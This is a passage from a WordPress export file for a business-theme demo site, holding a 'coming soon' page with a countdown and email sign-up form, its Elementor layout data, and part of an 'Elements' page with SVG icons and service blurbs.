							<img width="141" height="25" src="https://maxbizz.s3.amazonaws.com/images/logo-home3-black.png" alt="" loading="lazy" />								</a>
			<h2>Maxbizz is in the Works!</h2>		
		<ul data-zone="0" data-date="01/23/2021" data-day="Day" data-days="Days" data-hour="Hour" data-hours="Hours" data-min="Minute" data-mins="Minutes" data-second="Second" data-seconds="Seconds">
			<li>00<p>Days</p></li>
			<li>:</li>
			<li>00<p>Hours</p></li>
			<li>:</li>
			<li>00<p>Minutes</p></li>
			<li>:</li>
			<li>00<p>Seconds</p></li>
		</ul>
		<p>We are about to go live so watch this space!</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f610-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="610" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f610-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><button>Sign Up</button>
</form>		
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>604</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"f1dbf06","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/coming-soon.jpg","id":607},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","height":"full","content_position":"middle","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"65f2915","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"adfe967","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/logo-home3-black.png","id":2091},"image_size":"full","image_custom_dimension":{"width":"80","height":"80"},"width":{"unit":"px","size":140,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"link_to":"custom","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"image"},{"id":"32c523f","elType":"widget","settings":{"title":"Maxbizz is in the Works!","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":51,"sizes":[]},"typography_line_height":{"unit":"px","size":110,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":42,"sizes":[]},"typography_line_height_mobile":{"unit":"px","size":55,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"title_color":"#1A1A1A","typography_font_weight":"700"},"elements":[],"widgetType":"heading"},{"id":"df3cd75","elType":"widget","settings":{"day":"Day","hour":"Hour","min":"Minute","second":"Second","days":"Days","hours":"Hours","mins":"Minutes","seconds":"Seconds","_padding":{"unit":"px","top":"0","right":"0","bottom":"90","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"date":"2021-11-20 12:00","number_typography_typography":"custom","number_typography_font_family":"Open Sans","number_typography_font_weight":"600"},"elements":[],"widgetType":"icountdown"},{"id":"2c42310","elType":"widget","settings":{"editor":"<p>We are about to go live so watch this space!<\/p>","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]},"text_color":"#555555","typography_font_family":"Inter"},"elements":[],"widgetType":"text-editor"},{"id":"5507345","elType":"widget","settings":{"cf7":"610","_padding":{"unit":"px","top":"0","right":"0","bottom":"115","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"},{"id":"880944e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:22:"image_custom_dimension";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_line_height";i:1;s:27:"typography_font_size_mobile";i:1;s:29:"typography_line_height_mobile";i:1;s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:10:"icountdown";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:4:"date";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:3:{s:28:"number_typography_typography";i:1;s:29:"number_typography_font_family";i:1;s:29:"number_typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:6:{s:5:"align";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;s:10:"text_color";i:1;s:22:"typography_font_family";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:2:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:1;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;}}s:6:"layout";a:1:{s:14:"section_layout";a:2:{s:6:"height";i:1;s:16:"content_position";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/elements__trashed/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=624</guid>
		<description></description>
		<content:encoded><![CDATA[<h4>Icon Boxes</h4>		
						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>					
			        				            <h6>Financial Services</h6>			            <p>We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>					
			        				            <h6>Government Services</h6>			            <p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>					
			        				            <h6>Consumer Products</h6>			            <p>Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.</p>			        
